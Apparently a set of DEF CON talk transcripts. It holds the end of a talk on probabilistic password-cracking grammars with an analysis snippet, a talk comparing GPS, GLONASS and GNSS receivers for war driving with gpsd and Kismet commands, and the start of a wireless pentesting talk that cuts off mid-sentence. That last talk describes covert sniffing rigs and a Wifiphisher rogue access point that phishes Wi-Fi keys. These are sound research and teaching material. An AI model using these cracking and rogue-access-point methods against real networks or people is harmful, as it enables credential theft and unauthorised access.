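        runs = re.findall(r"[a-zA-Z]+|\d+", pw)
        key = "".join(("A" if r[0].isalpha() else "D") + str(len(r)) for r in runs)
        structures[key] += 1
        for r in runs:
            if r.isdigit():
                digit_runs[r] += 1

    total = sum(structures.values())
    for s, c in structures.most_common():
        print(f"structure {s}: p = {c / total:.2f}")
    for d, c in digit_runs.most_common():
        print(f"digit run {d}: seen {c} time(s)")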
Staying with those URL statistics: if you scroll down a little, you can usually actually see what the website was, because people have a tendency to use the website name in their password. I also highlight the dates it finds, because that's useful for trying to date when the password data set got leaked. I do want to point out that there's a long tail when it comes to the dates, because people create passwords for years before the data set gets stolen, so you'll see passwords referencing years well before the data set actually got dumped. But if you go down the list a bit, you can say, okay, that's probably about where the cutoff was for when this password data set was disclosed. One last thing I want to talk about real quick is that I am trying to get this to work with other cracking modes. One really popular cracking mode is called PRINCE. PRINCE basically takes a lot of different words, combines them all together, and makes lots of guesses based on that. One challenge with PRINCE is that it's very dependent on the input word list you give it: the word list needs to have high quality words in it, but it also needs a level of cruft, because if you want to, say, add the number 1 to the end of a word, you need a 1 in your word list by itself. And the larger your word list is, the more words you're trying to combine, and it starts to have issues. Well, we have all this probability information about how passwords are generated, so maybe we can use it to create very bespoke word lists for a PRINCE-style guessing session. So I created another tool called PRINCE-ling that does exactly that. (Sorry, my microphone just went out again there.) It creates a very high quality word list, and it does it automatically. One thing I like about PRINCE is that it's the kind of attack I run when I want to goof off: password cracking sometimes takes a lot of brain cells, because you're watching how the cracking is going and trying to optimize your session, whereas PRINCE is, I have no idea what I want to do, I want to go watch Tiger King on Netflix, let's just launch this and come back later to see if it was successful. And PRINCE is usually actually quite successful, so it's a pretty good tool to use, and anything I can do to automate PRINCE even more, I'm all for, which is why I created that. So I'm going to stop the live stream here, and hopefully I'll be on Discord to answer any questions you have. I hope you enjoyed this and found it helpful, and once again, thank you for attending the Password Village here at DEF CON Safe Mode.
|
Probabilistic Context Free Grammar (PCFG)
|
10.5446/51658 (DOI)
|
into Wicked War Driving with GPS and GLONASS. I'm White Shadow, and I'm going to be describing GPS, how it works, the data you receive from GPS satellites, other satellite constellations that provide similar location data, some dongles you can use to receive all of that information, and how to use that in your war driving efforts. So who am I? I'm a prior staff sergeant from the US Air Force. I was in Air Force Space Command, which is now called the Space Force. Since getting out of the military, I've become a wireless security researcher. Some of my public works are SniffAir back in 2017, and last year I presented at the DEF CON Wireless Village with Solstice on some attacks on WPA3 and OWE. In the picture on the right there, you can see that's me and Solstice on stage last year; that's my Twitter profile picture. So, war driving. Why do people do it? Before becoming a pen tester, I had this vague understanding of war driving as driving around sniffing wireless networks and then plotting them out, but why would anyone actually do that? Once I became a pen tester, I realized there is a valuable need for the skill set. Many times clients set up new wireless infrastructure in their building and want to measure the signal bleed outside of their building, so performing a war drive for a client may be useful. Or maybe they're just curious whether their neighboring businesses are able to receive their Wi-Fi signal, so they may want a wireless pen tester to go out and do a war drive to measure how far the signal goes and exactly where it can be picked up from. It can also just be done as a hobby. WiGLE.net is a great resource for this; you can see the picture of WiGLE in the bottom right-hand corner. It's an open source database that hobbyists can war drive and upload their results to. Anyone can upload to it and anyone can query it, so you can look up any of the data uploaded by hobbyist war drivers who drive around mapping Wi-Fi networks to GPS coordinates. As I got into war driving professionally, I realized that the research on GPS dongles was extremely lacking. When it came to choosing a GPS dongle for war driving, there's basically only one that everyone uses, and whenever you ask somebody why they chose that dongle, the answer is usually "because somebody told me to use it." There really isn't much out there on it; if you Google it, it's really hard to find any information. So, drawing on my experience from Air Force Space Command, I knew that GPS is an American-owned and operated satellite constellation; specifically, Air Force Space Command handles the operation of GPS. A little history on that: satellite navigation goes back to the 1960s, when the Navy had its own satellite. Other branches of the military had their own navigational satellites as well; the Air Force and the Army did. In 1968, the DoD made everyone collaborate and act as one big happy family, so the Army satellites were decommissioned, and the Air Force and Navy satellites combined into one constellation that was used for navigation up until 1978, when Navstar 1 was launched. That is the first GPS satellite, as we know GPS today. Since then, 72 have been launched, with 24 currently in use; they need 24 satellites to maintain worldwide coverage. Now, there are additional satellites on orbit. You can see there are about 33 up there, give or take. These are referred to as on-orbit spares.
These are typically older satellites; they get pushed out as newer ones are launched to take their place, and they typically don't have the best capabilities, so they're usually not in use. GPS is in a MEO, or medium Earth orbit, which means it goes around the Earth twice a day, one full orbit every 12 hours. There are other orbits out there that people should be familiar with, such as LEO, low Earth orbit. That's things like the space station, which goes around the Earth every 90 minutes, so a LEO orbit is about 90 minutes, whereas a MEO orbit here is about 12 hours. There are other orbits as well, such as HEO, a highly elliptical orbit: satellites with some kind of wonky orbit, typically so they can hang out over a certain part of the Earth for a certain amount of time and then come around again. Then there's also GEO, geostationary or geosynchronous satellites. Those satellites are so far from Earth that they're actually in sync with the Earth's rotation: they revolve around the Earth at the same rate the Earth rotates, which creates the illusion that they sit over a static point on Earth. A common example everyone would know is satellite TV: whenever the technician came over to set up your satellite TV at home, he set up a dish, pointed it at a single point in the sky, screwed it in place, and then never touched it again, because he pointed it at a satellite that is in a static point in the sky. Now, GPS uses trilateration to determine the location of an individual. So what is trilateration? It's hard to explain in three dimensions, so I'm going to do my best to describe it in two. Let's say you're somewhere in the US and you turn on a GPS receiver. The first satellite sees you, and it's going to say you're within its spot beam, this red circle. So according to that satellite, with just the data from it, your location is anywhere within this red circle. That's not very valuable; that's not very accurate. Now your receiver picks up a second satellite. According to that satellite, you're anywhere within this blue circle. Again, individually that doesn't mean much, because you could be anywhere, but where the circles overlap you can start to see how this whittles down where we might be. Now let's say a third satellite sees you, and you're anywhere within the green circle. We can see that these circles overlap at a common point, and when you zoom in on that, you can see that this is how a latitude and longitude is calculated from GPS satellites, using trilateration to find you on Earth. You can use your imagination here: if I were to continue drawing circles on this map, the area where they overlap would get smaller and thus more precise. So we know GPS needs three satellites for trilateration, and there are at least four satellites visible at all times. Most GPS receivers typically won't provide information until they get a lock on that fourth satellite, because with the fourth satellite, in addition to latitude and longitude, you can also calculate altitude and additional things. The bottom line is the more satellites you have, the more accurate the information is going to be. But what is that information? What is the data that comes down from these GPS satellites? Well, I have an example of it here. These are called NMEA messages. I know that's a funny word.
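Before moving on to the NMEA data itself, here is a small Python sketch of the two-dimensional trilateration picture just described: three "satellites" at known positions, a measured distance to each, and the receiver's position recovered by subtracting the circle equations to get a linear system. The coordinates and distances are invented, and real GPS solves the three-dimensional version of this problem.

    # Toy 2D trilateration, mirroring the circles-on-a-map explanation above.
    def trilaterate(p1, r1, p2, r2, p3, r3):
        (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
        # Subtracting the circle equations pairwise gives two linear equations.
        a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
        c1 = r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2
        a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
        c2 = r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2
        det = a1 * b2 - a2 * b1
        return ((c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det)

    # The receiver is actually at (3, 4); the distances were computed from there.
    print(trilaterate((0, 0), 5.0, (10, 0), 8.0623, (0, 10), 6.7082))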
I'm going to skip over what NMEA stands for for the moment; just look at these messages. What I want you to pay attention to are the last three letters of each message: GGA, GLL, GSA, GSV, RMC. These refer to the type of message it is. The first two letters of each message indicate which satellite system it came from, so GP indicates that the message came from a GPS satellite. So you can see the different messages we have here, and at the bottom of the screen, those are legitimate NMEA strings coming down from satellites in space. That's what the data looks like coming down from space. Being in Air Force Space Command, I was aware of US GPS, but I was also aware that other countries did not want to rely on US GPS, just in case we went to war with them or something like that and GPS got jammed. So they created their own satellite constellations that do the exact same thing, and this is where Russian GLONASS comes in. Just like US GPS, Russia has its own satellite constellation that does the exact same job. It was originally launched in 1982; since then 27 satellites have been launched, 21 of them in use, with 24 total in orbit, so they have about three on-orbit spares. They accomplish the same task that GPS does with 24 satellites in orbit using only 21, by using a slightly faster orbital period. Remember when I was talking about medium Earth orbit, how MEO GPS satellites go around the Earth every 12 hours? Well, GLONASS goes around in a little over 11 hours. After thinking about Russian GLONASS, I started wondering: why wouldn't you want to receive data from both GLONASS and GPS? At any given time, if you're in an empty field on a perfect day with perfect weather, you could receive 12 GPS satellites. With GLONASS, it's about 6 to 10, depending on where you are on Earth and the weather conditions. So why wouldn't you want to receive both? While GPS does have worldwide coverage, its coverage around the poles, northern Europe and northern Russia, is not that great. GLONASS actually makes up for that; it fills in the areas where GPS is lacking. So again, why wouldn't you want to receive both? They both have worldwide coverage. There's a common misconception that GLONASS receivers are only accurate in Russia, that you can only use a GLONASS receiver in Russia. Well, just as the US military uses GPS to guide ships, planes, and bombs, and wants those ships, planes, and bombs to have accurate navigation data whether they're in the US, in Russia, or anywhere else in the world, the same thing applies to GLONASS. Russia also has ships, planes, and bombs navigated by GLONASS, and it wants them to have accurate navigational data regardless of where they are in the world. So both of these satellite constellations work worldwide. And as I started looking into it, I realized a lot of smartphones have actually started implementing this; I believe the iPhone 7 or iPhone 8 implemented a combined GPS and GLONASS receiver. So I kept thinking about constellations, and then I remembered Galileo, another one, made by the European Space Agency. It was first launched in 2011; since then 24 satellites have been launched, and many of their satellites are still going through the process of being commissioned and brought online.
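Since the talker and sentence-type naming convention comes up repeatedly here (GP for GPS, GL for GLONASS, and so on), this is a minimal Python sketch of pulling those pieces out of an NMEA sentence, along with the standard XOR checksum computed over everything between the '$' and the '*'. The sample sentence and its field values are made up for illustration.

    TALKERS = {"GP": "GPS", "GL": "GLONASS", "GA": "Galileo", "GN": "combined GNSS"}

    def parse(sentence):
        # Drop the leading '$' and any '*XX' checksum suffix.
        body = sentence.lstrip("$").split("*")[0]
        checksum = 0
        for ch in body:              # NMEA checksum: XOR of every character
            checksum ^= ord(ch)
        header = body.split(",")[0]
        talker, msg_type = header[:2], header[2:]
        return TALKERS.get(talker, talker), msg_type, format(checksum, "02X")

    # Example: a GSV (satellites in view) sentence from a GLONASS talker.
    print(parse("$GLGSV,2,1,08,65,45,030,41,66,12,120,38"))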
Back to Galileo: you can see there are 14 satellites in use, but a lot of them are being tested and brought online to actually work within the constellation. And again, these are MEO satellites as well. When you look at all of these satellites and compare the pictures here (if anyone's curious, all these pictures are from Kerbal Space Program), you compare GPS on the left, 24 satellites for worldwide coverage, versus all the satellites on the right, and you see how many there are. The number of trilateration circles you can draw on the map goes up enormously. So then I wondered, well, how many satellite constellations are there? There are several GNSS constellations. Europe has Galileo. Japan has QZSS. Russia has GLONASS. India has IRNSS. The US has GPS. And China has BeiDou. They are all classified under the umbrella term GNSS, Global Navigation Satellite System. That's confusing, because that's also what GLONASS stands for. However, whenever you see GNSS, it's referring to all of the satellite constellations. And it's interesting, because regardless of where a satellite constellation originates from, they all speak the same language, and that language is NMEA. That's the funny word I said earlier that I would skip over. It stands for National Marine Electronics Association, and it's the standard that defines how data is transmitted in sentence form from one talker to multiple listeners, from one satellite to multiple receivers on the planet at once. You can see in this screenshot that these are NMEA strings, or sentences, sent from multiple satellites, because you can see the last three letters of each message: GSV, GSV, GSV. But the first two indicate which satellite it came from. GPGSV came from a GPS satellite. GLGSV came from a Russian GLONASS satellite, and we have two more of those GL messages. Then we have a GAGSV message, which came from a European Galileo satellite. Then there's this GNRMC; that's another GNSS message. There are also satellites I didn't even mention on the previous slide that sit out in geosynchronous orbit and provide error correction information. And we can receive all of these things because they speak a common language. So now that we know GPS is not the only satellite system that does location services, and that they all speak a common language, there have got to be dongles out there that can receive all this information, right? That's what sent me on this quest to buy a bunch of dongles, analyze what they could do, see if I could reconfigure them to receive additional satellite constellations, and then perform some tests with them. Aside from just going to Amazon and buying every GPS and GNSS dongle I could find, these are the software tools I used. gpsd is what takes the information from your dongle and starts a server that you can connect to with tools like gpsmon, to troubleshoot or just view the information, or Kismet. And Kismet will actually correlate that GPS data with the Wi-Fi information it sees so that you can war drive. Now, the commands I've laid out here: gpsd -D 2 sets the debug level, and you can increase or decrease that number to change the verbosity of the output. The lowercase -n is to not wait for a GPS lock before querying for messages. That's important because you want to see those NMEA strings as they come down from the dongle without having to wait for it to receive a full lock.
Then the dash capital N there tells GPSD not to run as a background process and leave it in the foreground. Then I'm specifying my serial device. Then I'm using dash S and 2948 to specify a different port to host the GPSD service on. I did this because Kali has a service that it starts on 2947, which is the default for GPSD. So instead of just disabling that, I just got in the habit of starting this on my own port. I'm also using GPSmon to troubleshoot or just to analyze the information coming down from GPSD. And you can do that with GPSmon dash n, which tells GPSmon to look for NMEA strings. And then you specify localhost and the port that I used in starting GPSD. I also use the u-center software from u-blox, which only works on Windows, but it's extremely useful in configuring GPS dongles and GNSS dongles. And I'll get into that a little bit later. And then I also used Kismet in this. And it's important to note that you have to go into the Kismet config file and uncomment the line where it says that you want to use GPSD. So first up was the BU-353S4. This is the dongle that everyone uses. This is the one that everyone recommends that everyone use. And it's GPS only. So on the right side of the screen here, we have output from GPSmon. And I've highlighted some fields here. So on the left, we see PRN. And this number is the designator for each satellite in the constellation. So when it comes to US GPS, you're only going to see numbers between 1 and 32 in this PRN field. Now at the very bottom of that PRN field, you see a number that says 138. That is actually one of the geosynchronous satellites that sits out and provides error correction. Next to the PRN field I've highlighted SNR, that's the signal-to-noise ratio. So that shows you the signal that you're getting from a specific GPS satellite. And then on the far right of that picture, I've highlighted the number of satellites. And it says the number of satellites is 7. You can see in the signal-to-noise ratio block that only seven of these satellites there are providing a signal there. So that's most likely why GPSmon is only showing seven satellites. So that's cool. Now in this example, I'm using the older version of Kismet. Sorry if Dragorn is watching. But actually, this is a feature request. If I could get this back into the newer version of Kismet, because space nerds like to see GPS information like this. You can see on the top right, I'm pulling down the NMEA strings straight from the serial device by just using the cat command and then specifying the serial device. And you can see the NMEA strings coming down from space. But on the left side, after starting up Kismet and everything, it can see the satellites. However, it says I don't have a signal. I don't have a strong enough signal on enough satellites to determine my location. And that's stressful. That's infuriating. When you're trying to perform a war drive, maybe there's bad weather outside or something, and you just want to get it done, this isn't going to help anyone. Just sitting around waiting for lock. So this was what inspired me to look for additional dongles, because I've been in this situation many times on a wireless pen test when I'm waiting on this GPS dongle to lock up so that I can start my war drive or war walk and hurry up and get out of there. But you could see if we just had more satellites in space to lock up on, other than the 32 in the entire GPS constellation, maybe that would make it easier to obtain lock.
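Pulled together, the command-line workflow described above looks roughly like this (the serial device path is an assumption, and the exact GPS line in kismet.conf differs between older and newer Kismet releases):

    # start gpsd in the foreground, verbose, not waiting for a fix, on a non-default port
    gpsd -D 2 -n -N /dev/ttyUSB0 -S 2948

    # watch the NMEA data that gpsd is serving
    gpsmon -n localhost:2948

    # in kismet.conf, uncomment/point the GPS setting at that gpsd instance, e.g.
    #   gps=gpsd:host=localhost,port=2948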
So when I started talking to people about this, this was one of the first dongles that was recommended to me. Now, it's important to note it says GPS slash GLONASS. That slash means or and not both. So you can only configure this dongle to work with GLONASS or GPS and not both. And you can use the U-Center software to configure this. And I've highlighted the configuration screen from that on the right here. You can see it has all these satellite constellations that you could actually select. And some of them are grayed out in this example, Galileo, Beto, and I M E S are grayed out. But GPS, SBAS, and QZSS are selectable. And whenever you select a configuration here, at the bottom of this configuration menu, there is a send button that you must push to push the configuration to the dongle. And again, in this testing, I found out very quickly that I could only configure this dongle for GPS or GLONASS. So I ended all my testing with that because I was looking for dongles that could do both. Now, I wanted to talk about the U-Center software because it can be a pain to use, a pain to learn. And there's not a lot of resources out there on how to use it. Like I mentioned before, it's a Windows-only piece of software that you can download for free from their website. Once you install it and everything, you launch it. And then from the receiver drop-down menu, go into connection. And then you'll see the COM devices there for you to select your USB dongle. Once you've selected that, you can then go to the view drop-down, go to configuration view, select GNS config. And then you can actually select which satellite constellations you want to receive from. And I mentioned it before, but after you select which constellations you want to receive from, you go down to the bottom and click Send. And then that will push the configuration to the dongle. However, you have to save that configuration after you have sent it. So from receiver drop-down menu, go to action and save config. And that will store that configuration in the memory on the dongle. So when you unplug it and then plug it into another computer, that configuration is saved there. Specifically, if you want to only receive GLONASS satellite. So I configured a dongle here to only receive data from GLONASS satellites. In the bottom left-hand corner, you can see that GLONASS is the only constellation that is enabled. And the top left, you can see all the NMEA strings that are coming from GLONASS satellites indicated by the GL in front of every message. And then on the right side, I just have a pretty picture showing the Russian flag next to every satellite that I'm receiving a signal from. Now, once I save that configuration from the use center software, unplug that dongle from my Windows machine and then plug it into my Linux computer and use GPSD and GPSMON to receive information, you can see here in GPSMON, the PRN numbers are now between 65 and 88. That is because those are Russian GLONASS satellites that I'm receiving a signal from. And again, on the right side, I've highlighted that there's seven satellites I'm receiving signal from. And you can see that from the signal-to-noise ratio there that two satellites aren't reporting a signal. So this is one of the first dongles that I found that could do both. It was advertised as a GNS receiver. It said it could receive all the things. And I wanted to test it out and just buying it and plugging it in to Kali Linux. It worked right out of the box. 
I was able to hook it up with Kismet after starting up GPSD. And then you can see from the output on the left side of the screen there from the GPS info in Kismet, you can see all the satellites that I'm receiving data from. So 1 through 32 would be US GPS satellites, 65 through 88 are Russian GLONASS satellites. And then 131, 135, 138 are the geosynchronous satellites that provide error correction data. So that's cool. But I want to receive more. And so I found this dongle that receives all of the things, GPS, GLONASS, Galileo, BeiDou, QZSS. And you can see that in the u-center software. You can see the first six satellites are US GPS, then the next six satellites, six or seven satellites, are Russian GLONASS satellites. Then there is another geosynchronous satellite that provides error correction. And then the final two satellites in that picture are European Galileo satellites. This is the same screenshot, but on the left side, you can see the NMEA data coming down from them. You can see that the very top GLGSA came from a Russian GLONASS satellite, GAGSA came from a European Galileo satellite, GPGSV came from a US GPS satellite. So we are receiving information from all three constellations with a single dongle. What does that look like in GPSmon? GPSmon couldn't even handle all the satellites that it was picking up. So this screen only goes to 11. And you can see on the right side that I picked up at least 15. And then I also showed the sentences block of GPSmon. And in this block, you can see those messages that I was just referencing. GNGGA came from a GNSS satellite. GPGSV came from a GPS satellite. GLGSV came from a Russian GLONASS satellite. So this is a quick way to see what messages you're receiving and which satellites you're receiving from. So if you were to plug this into Kismet, what would that look like? Again, you can see I have a lock on 23 satellites. And again, 1 through 32 is US GPS. From 65 up to 83 is Russian GLONASS. And then 309 and 312 are European Galileo satellites. OK, so big whoop. You found all these GPS dongles. You found some that could pick up other satellites. But what does it mean? What does it mean to war driving? And what does it mean to accuracy in general? So I ran some tests. I set up equipment with each dongle and drove around a neighborhood. And let's see the results. So with GPS only using the BU-353, you could see here that, yeah, it looks pretty good. I did a little loop over here in this neighborhood to test the precision there. It looks a little off. But I mean, for the most part, it looks like I'm on the road. I was in a car, so I was on the street the entire time. So there are some areas where it looks like I was on the sidewalk. But for the most part, this is pretty accurate. Next, I had one of the dongles configured for GLONASS only. So just using Russian GLONASS satellites, it kind of looks like I was off in the grass and driving over people's houses. But for the most part, it still captured the same path. Then we have the GNSS receiver. So this is receiving all the things from GPS, GLONASS, Galileo. And you can see this actually looks much better. It looks like I'm more in the center of the road, which is closer to where I was actually driving. The circle around this tree up here looks a lot better. But let's compare all of them when we overlay them together. So the green lines are going to be GPS. GLONASS is red. And the GNSS receiver is yellow.
So for the most part, the tracks all look the same, with GLONASS sticking out a little bit. But let's zoom in on that circle there. So you can see the way I drove this path was I came down through the top of that parking lot and did a lap around the tree and then left out the front entrance there. So with the yellow line, you can see that I actually stayed on the road. With the green line, it shows me off in the grass a little bit. But for the most part, it's fairly accurate. And the red line from just GLONASS-only information shows me running off in the grass and driving over cars like a monster truck, which is not what I did. But yeah, so what did we learn from that in a rural area with not much in the way to obscure the sky? It really doesn't matter which dongle you use. They're all fairly accurate for the most part. I mean, it wasn't off by too much if I was plotting Wi-Fi networks. But let's test this again in an area where there are things obscuring the view to the sky. So I drove to downtown Denver and ran the same test. So we can see here GPS. Well, that looks pretty good. There's only a few sections there where I got a little squirrely going around the corners of some buildings. But for the most part, that's really accurate. GLONASS only, I don't even know what happened. Clearly, it can't handle an urban environment. But using the GNSS receiver, this was definitely the most accurate. And all the results there, you can see, it shows you exactly which street I'm on. And you can see the path that I drove. Let's overlay them all together. And you can see, for the most part, GPS by itself was fairly accurate as well. It just got off path a little bit. But yeah, we can zoom in and see that there. That GPS kind of showed that I drove through a building and off through some trees. But for the most part, it stuck close to the road where I actually was. And if we're mapping Wi-Fi networks in something like WiGLE or something like that, this information doesn't need to be the most accurate. I mean, if you're sending someone on site to go and attack this Wi-Fi network, they're going to find it if they're within that same area that GPS is kind of saying that we went to. So while it is not the most accurate, it's still pretty accurate there. So the results here are that the GNSS dongle was the most accurate in all of the war driving results. GLONASS by itself was the least accurate. And the GNSS receiver locked up the fastest. In all of these cases, when I was testing this out, what I did was I drove to the starting location, plugged in everything, and then sat there, waited for it to get locked. And then I gave each one 10 minutes sitting stationary before I conducted the drive. And the GNSS receiver locked up instantly every time. And that's simply due to the number of satellites in the sky that it can pull information from. So what do you want to look for when you're looking for a GNSS dongle? First, make sure it's a GNSS receiver. GNSS means that it receives all of the things. The u-blox chipset is easy to configure with that u-center software. Everything is point and click. There are some Python pip modules to interact with u-blox chips or chipsets, such as the one seen on the right here, which leads me to the third bullet point of looking at the supported operating system. When you're looking at various dongles, they may say it supports Windows. It may say it supports Linux.
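If you want a quick sanity check on what a given dongle is actually reporting before you commit to it for a drive, one rough approach is to lean on gpspipe from the gpsd client tools (the port here matches the earlier gpsd example and is an assumption):

    # dump 100 raw NMEA sentences from the running gpsd instance
    gpspipe -r -n 100 localhost:2948

    # tally the talker IDs to see which constellations are actually represented
    gpspipe -r -n 100 localhost:2948 | cut -c 2-3 | sort | uniq -c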
You want to make sure that it's going to work with the operating system that you're going to use in your war driving efforts. So this $200 Raspberry Pi hat isn't going to work with a Windows computer. It's important to note that. And I also wanted to note that I'm not telling you to buy the dongle that I used in this. I'm not saying that my research is the end all be all. All I wanted to do was provide enough knowledge to the community to be educated enough to make decisions on what kind of dongle to buy. Now that you know that GPS is not the only satellite out there, you know what kind of data comes down from these satellites. And you know that there are dongles out there that can receive that NMEA data and determine location. So now that everyone is educated on this topic, you can go out there and do your own research. This SparkFun Pi hat was brought to my attention shortly before this presentation was made. So I didn't have enough time to play around with this and get it working enough to be a part of this presentation. But it's certainly up for anyone. Anyone could do that. I'm not the expert on this. I just wanted to provide my background knowledge, the fundamental knowledge of how GPS works, so that everyone else could go out there and make the same kind of decisions that I did. Just buy a bunch of dongles and do the research yourself and try to find out what works best for you. Now that you are armed with all that knowledge, you can go out there and buy your own dongles, and you know exactly what's coming down from space to provide your location. Go war drive the world. WiGLE is doing a war driving contest with DEF CON this year as part of their wireless CTF. Check it out. Sign up. Select a block of the world. War drive some access points and collect some points. If you want to continue the conversation with me on war driving, you can find me on Twitter at thedericot. If you want to see projects that I'm working on, there's my GitHub link.
|
I'll begin the talk giving my experience working in Air Force Space Command and how they fly GPS satellites. GPS is only one constellation of “GPS” satellites in space. Several other countries have their own version of GPS. Russia has GLONASS, China has Beidou, Europe has Galileo, Japan and India also have their own satellite constellations. All these satellites speak a common language known as GNSS. With the correct dongle, NOT THE BU-353, you can receive location data from more than the US controlled GPS satellites in space, this gives you more reliable location data for war driving. I’ll then go into a description of war driving with kismet and all the things kismet can collect on. I’ll then show off a dongle box I slapped together that is similar to El Kentaro’s kismet box. It is a pelican case with a 7 port, USB hub hot glued inside with holes drilled in it so antennas can be mounted externally. After talking about wardriving, I’ll talk about uploading results to WiGLE or uploading a kismet pcapppi file to google earth to keep wardrive data private. This is how you can review actively collected war drive data, but what if you want to review the work that others have done? Enter wigleQuery (https://github.com/wytshadow/wigleQuery). Querying WiGLE through their web interface provides a weak user experience, the access points are hard to see, even when you zoom in, and getting additional details on each access point is not very intuitive. WigleQuery provides an easier way to query WiGLE for WiFi Access Points based on BSSID(s), ESSID(s), Lat/Long and plots the result on google maps using easy to see colors and also outputs the results in CSV format for further processing. This output data can also be used when asking WiGLE admins to have your access points removed from the WiGLE database. I’ll conclude talking about future improvements to be made to wigleQuery.
|
10.5446/51659 (DOI)
|
Hey everyone, my name is Eric Escobar and today my talk is going to be on detecting the unseen adversary, which is really just wireless blue teaming with a snappy-sounding name to it. So this talk is going to be a one-cut take. There's going to be a lot of ums, a lot of uhs, a lot of me fumbling with my mouse trying to transition a slide. So this is going to be just as if I were up on stage and the demo gods are just going to be as much of a problem. So without further ado, let's talk about me. So I like to kind of pose the point that I'm the forever noob. The best thing about computers and computer security is that no one is ever going to know everything and the person that says that they do is just completely lying. I started off my professional career as a civil engineer. You know, I got my degrees in civil engineering to build bridges, dams and all these big things that you see out on the highway. I got the opportunity to basically be an analyst at a company. I got a great opportunity there. We started coming to DEF CON from I believe DEF CON 22. And from there I was competing in the wireless capture the flags. We won a couple of times and now I'm one of the village members and yeah, I get to help make the challenges. And my full-time job now is as a pentester for Secureworks, where I basically just pentest wireless all day. And this talk is really one of these talks of stuff that isn't crazy super hackery, stuff that isn't completely unobtainable. It's a lot of simple tactics that I used to get into a lot of really large companies. And really this talk kind of stems from the fact that these are conversations that I have with my clients day in and day out. And it'd be really nice to point people in the direction of kind of like my overall summary of this stuff. Okay, so detecting the unseen adversary. It's like a super marketing title that I'm not in love with obviously, but whatever. I needed a tagline. So one of the things that I've discovered just doing wireless pentests is that a lot of my clients have robust logging and alerts for all of their internal network security and all their external network security. Now, when I say external, I'm talking about like the public internet. So they have firewalls that detect when scans get run. They can detect somebody doing some nefarious stuff on their internal environment. But they almost all fall down when it comes to detecting anything on their enterprise wireless. So any, you know, WIDS or WIPS, which is wireless intrusion detection or intrusion prevention. It's basically, you know, stuck back in the 90s; there are not a lot of companies that do it. And if they do anything regarding it, it's not really that robust and can get knocked over pretty easily. So some of the benefits of wireless attacks: I don't have to have any internal access to any network or any environment, you know, I don't have to sneak in anywhere, I don't have to clone keys, badges or do any of this. I can typically just post up in a park with a, you know, with a long range antenna or, you know, sit in some kind of lobby or common area and, you know, I don't need any special access like I would if I were going to try and plug in a device. It's way easier for me to stay anonymous and I can stay out of sight. And then especially if I'm attacking somebody's external infrastructure, there's really not any IP addresses that are going to be logged or anything along those lines that are going to get me caught or at least create a footprint.
So that's a lot of the reasons why I like, you know, doing wireless from that kind of standpoint. This is kind of an old image, but this kind of goes back to my old kit of what I, you know, what was founded out of competing in the wireless CTF. Basically, it's just comprised of a little lithium or a little lipo battery. No, it's a whatever, just a little anchor battery connected to a Raspberry Pi and the Raspberry Pi has a USB, you know, wireless adapter that I can put in a monitor mode. That's an old TP-Link network adapter. It's, you know, old compared to today's standards. You know, now I use something like a Panda that can do 2.4 and 5 gigahertz frequencies. But at the end of the day, that can easily just fit in my pocket, fit in a backpack, and I can then use my phone to connect into that Raspberry Pi and simply have, you know, an Airmon screen or any of my normal tools that run off of, you know, whatever flavor of operating system that you want on the Raspberry Pi. I can sit there with this device in my pocket, pen testing your network, you know, just sitting like, you know, any other college student just, you know, leaned up against a wall, you know, wouldn't attract a ton of attention. I'm not going to be like, you know, some of the wireless CTF, you know, members or competitors that walk around with like a laptop in their face, you know, with all these antennas and porcupine, you know, stuff all over. I'm not going to be the Wi-Fi cactus or anything like that when I come to try and pen test your site. And this is just a screenshot of my iPhone, you know, just some of the things that I can see out of the glance. And again, if you just see somebody walk in with their cell phone, you're not going to think anything of it, right? And then this is something that we've taken on engagements where we've, you know, gone on to a large, large site that we have to walk around. And really, this is just a black backpack, you know, you'd have to look a little bit harder to see that there are actually a bunch of omnidirectional antennas along with, you know, a bunch of just different network adapters all put into this backpack. And it's one of those things that if you're not looking for it, you know, these antennas could easily be placed inside of the backpack. But at the end of the day, we've been able to do engagements that cover thousands of acres worth of, you know, worth of a client's site. And you know, there was full on, you know, public people there, there were, you know, staff there, there were security people there. And no one saw us, we didn't stick out at all just because we're normal people with normal backpacks. And again, it's one of those things that it's easy to remain unseen and still do nefarious things. Here's another clip of the backpack. Basically, it's just some larger anchor batteries hooked into multiple Raspberry Pis. And again, you can see on the right hand side, a bunch of omnidirectional antennas that are kind of just placed, you know, in not necessarily covert, but in a way that you'd have to really look at that to know what's going on. So I think one of the biggest things, the biggest plan on the wall here is rogue access points. At least I shouldn't say everybody, a large amount of my clients are all very concerned with rogue access points, but they really don't, they really don't have any idea what they say or what they mean when they talk about rogue access points. 
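For context, a minimal sketch of what driving that kind of pocket rig looks like once you've SSH'd into the Pi from the phone (the interface name is an assumption — the USB adapter might show up as wlan1 or something else):

    # put the USB adapter into monitor mode
    sudo airmon-ng check kill
    sudo airmon-ng start wlan1

    # survey nearby networks and clients across both 2.4 and 5 GHz bands
    sudo airodump-ng --band abg wlan1mon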
And really by definition, a rogue access point is just any wireless access point that's not within your control that's in your airspace, you know, the physical airspace that you do control, where your access points might be. So I mean, really at the end of the day, technically any phone or any hotspot could be a rogue access point or it could be considered a rogue access point. But that's not really what clients most care about. They most care about access points that are designed to mimic their own access points that then their users will connect to and get tricked into, you know, potentially providing credentials or some other type of data that they shouldn't, right? So I'll just give you a couple of examples of what a rogue access point can do. There's this tool that I use from time to time called Wifiphisher. And essentially all that it does is it just stands up, you know, a hotspot with whatever name I want to give it and it will kick off users by de-authenticating them from their current network with the goal of having them connect to my rogue access point. And when they connect to my rogue access point, I send them to a captive portal. And the captive portal looks like a, you know, just a simple, it takes their user agent. So if they're coming from an iPhone, this would be like the iPhone Wi-Fi screen. This example is coming from a, you know, Windows 10 laptop. So when they open up their browser, it looks like, oh man, I need to type in my wireless network key. What most users don't realize, and most users, you know, aren't security people or tech wizards that are really going to, you know, analyze this. But if you have a full screen browser window open, you'll notice that that's all just rendered in the browser, that, you know, thing that's asking for your key. Now if a user types in their key and hits next, that will then submit it to me in clear text because I run that web server. That's my rogue access point. And then it's configured in such a way that the second that they give me a valid credential, it will then shut down my rogue access point so that me as an attacker can just automatically just say, hey, okay, like I'm going to be quiet now. I'm not going to try and draw any more attention to myself. It's one of those things that like, is this a crazy super sophisticated hacker technique? Absolutely 